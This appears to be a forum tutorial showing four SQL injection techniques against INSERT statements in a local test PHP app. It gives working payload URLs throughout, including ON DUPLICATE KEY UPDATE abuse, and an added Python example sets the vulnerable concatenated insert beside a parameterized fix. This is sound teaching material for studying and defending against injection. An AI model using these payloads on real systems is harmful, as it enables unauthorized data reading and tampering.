Hello everyone,
My friend Cyde and I have been looking at a project for a few days now, and we found a lot of SQL injection vulnerabilities where most of the statements were INSERT statements and not the usual SELECT. I know that most people think these kinds of injections are difficult and hard to deal with, and that's why in this tutorial I'll explain how to handle 4 different injection techniques.
The information
- Database/Table

What matters most in this table is that the column 'id' is unique and auto-increments: whenever a new comment is added it gets a unique id even if we don't specify one. Keep that in mind.
The script requires only two GET variables, 'videoid' and 'comment'. The username is automatically set to 'dotcppfile' and the id is generated automatically.
That’s all we need to insert a comment:
http://127.0.0.1/insert.php?videoid=123456&comment=interesting
- The comments that we insert show up at: http://127.0.0.1/comments.php (source: http://pastebin.com/58w0h2Nw)
Our Queries:
- INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456') // comment is vulnerable
- INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456') // videoid is vulnerable
- INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', `videoid` = '123456' // comment is vulnerable
- INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', `videoid` = '123456' // videoid is vulnerable
As you can see, both the vulnerable column and the syntax of the query change, and each combination needs to be handled in a different way.
Query 1:
INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456')
Column ‘comment’ is vulnerable.
If we want to inject a proper select statement into this we should go for:
http://127.0.0.1/insert.php?videoid=123456&comment=interesting', (select version()), '123456')--+
Our original INSERT statement will become:
INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', (select version()), '123456')--+', 'dotcppfile', '123456')
Now everything after --+ is treated as a comment, and what gets inserted into the database is a comment that says "interesting" whose username is the result of select version():
We’ve seen that before and it’s really simple but there’s a lot more to it so keep reading.
Query 2:
INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456')
Column ‘videoid’ is vulnerable.
Here there is a big difference: what we used before won't work, because we cannot edit the username, the comment or the videoid, since they're placed before our injection point.
Fortunately, in an INSERT Statement, you can insert multiple rows at a time using something like this:
INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('first comment', 'dotcppfile', '123456'), ('second comment', 'dotcppfile', '123456')
We are going to use this right now to get things working:
http://127.0.0.1/insert.php?comment=interesting&videoid=123456'), ('second comment', (select version()), '123456')--+
Our INSERT statement will become:
INSERT INTO comments (`comment`, `username`, `videoid`) VALUES ('interesting', 'dotcppfile', '123456'), ('second comment', (select version()), '123456')--+')
And the output on ‘comments.php’ will be:
So two comments were inserted and the second one was holding the result of our SELECT Statement.
Query 3:
INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', `videoid` = '123456'
Column ‘comment’ is vulnerable.
Our INSERT Statement will become:
INSERT INTO comments SET comment = 'interesting', username=(select version()), videoid='123456'--+', username = 'dotcppfile', `videoid` = '123456'
Nothing special about this one either, we’ve seen it before, but what about the last one?
Query 4:
INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', `videoid` = '123456'
Column 'videoid' is vulnerable.
Now this is something different, and our solution for Query 2 will not work because inserting multiple rows with this form of INSERT statement is not possible.
We did say that every comment gets its own unique id and, believe it or not, this will be very helpful.
Even though the INSERT statement doesn't provide a value for the id, since it's generated automatically, this doesn't mean that we can't provide one. So let's create a normal comment and give it a specified id.
Warning: we have to make sure that the 'id' we're giving is unique, or else we will get a MySQL error.
Our INSERT statement will become:
INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', `videoid` = '123456', id=2147483640--+'
And if we check the ‘comments.php’ page:

If we take a look at Data in the Table:

As you can see, our own ‘id’ was inserted, but, what’s the point?
What we are trying to do here is use the INSERT … ON DUPLICATE KEY UPDATE statement: http://dev.mysql.com/doc/refman/5.0/en/insert-on-duplicate.html
This statement can be used to update an existing row instead of inserting a new one when the given id already exists.
Example:
If we have the following Data in the Table:
2147483640 | 123456 | dotcppfile | interesting
And we try to insert the following using the INSERT … ON DUPLICATE KEY UPDATE statement:
2147483640 | 123456 | dotcppfile | second comment
The new row won't be inserted, but the existing row will be updated and become:
2147483640 | 123456 | dotcppfile | second comment
That’s what we’re going to use:
http://127.0.0.1/insert.php?comment=interesting&videoid=123456', id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())--+
Our INSERT statement will become:
INSERT INTO comments SET comment = 'interesting', username = 'dotcppfile', `videoid` = '123456', id=2147483640 ON DUPLICATE KEY UPDATE comment=(select version())--+
And the results:

So we updated the old comment with a new one that holds the result of any select statement.
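All four cases above share one root cause: the GET parameters are pasted into the SQL text. As an added example that is not from the original post, here is a Python/SQLite stand-in for insert.php (constructed schema, sqlite_version() in place of MySQL's version(); SQLite has no INSERT ... SET, so Query 1's column-list form is used) showing the concatenated insert beside the parameterized one that fixes every variant on this page.

```python
import sqlite3

# Constructed stand-in for the page's comments table: id is unique and auto-increments.
SCHEMA = """
CREATE TABLE comments (
    id INTEGER PRIMARY KEY AUTOINCREMENT,
    videoid TEXT NOT NULL,
    username TEXT NOT NULL,
    comment TEXT NOT NULL
)
"""

# The page's Query 1 payload for the 'comment' parameter, with SQLite's version function.
PAYLOAD = "interesting', (select sqlite_version()), '123456')--+"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    return conn


def db_version(conn):
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


def insert_vulnerable(conn, videoid, comment):
    # Mirrors the defect on the page: request parameters become part of the SQL text,
    # so a quote in 'comment' closes the literal and the rest is parsed as SQL.
    sql = ("INSERT INTO comments (comment, username, videoid) "
           f"VALUES ('{comment}', 'dotcppfile', '{videoid}')")
    conn.execute(sql)
    conn.commit()


def insert_safe(conn, videoid, comment):
    # Hardened form: bound parameters are sent as data, never parsed as SQL.
    conn.execute(
        "INSERT INTO comments (comment, username, videoid) VALUES (?, 'dotcppfile', ?)",
        (comment, videoid),
    )
    conn.commit()


def rows(conn):
    return conn.execute("SELECT videoid, username, comment FROM comments ORDER BY id").fetchall()


def demo():
    vuln, safe = new_db(), new_db()
    insert_vulnerable(vuln, "123456", PAYLOAD)
    insert_safe(safe, "123456", PAYLOAD)
    return rows(vuln), rows(safe)
```

Running demo() shows the concatenated version storing the subquery's result as the username, while the parameterized version stores the whole payload as literal comment text.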
Those 4 queries with different injection points cover most of what's out there, and we've succeeded in injecting all of them. Yes, we did good lol.
I hope you learned something new,
that’s all for today,
dotcppfile.
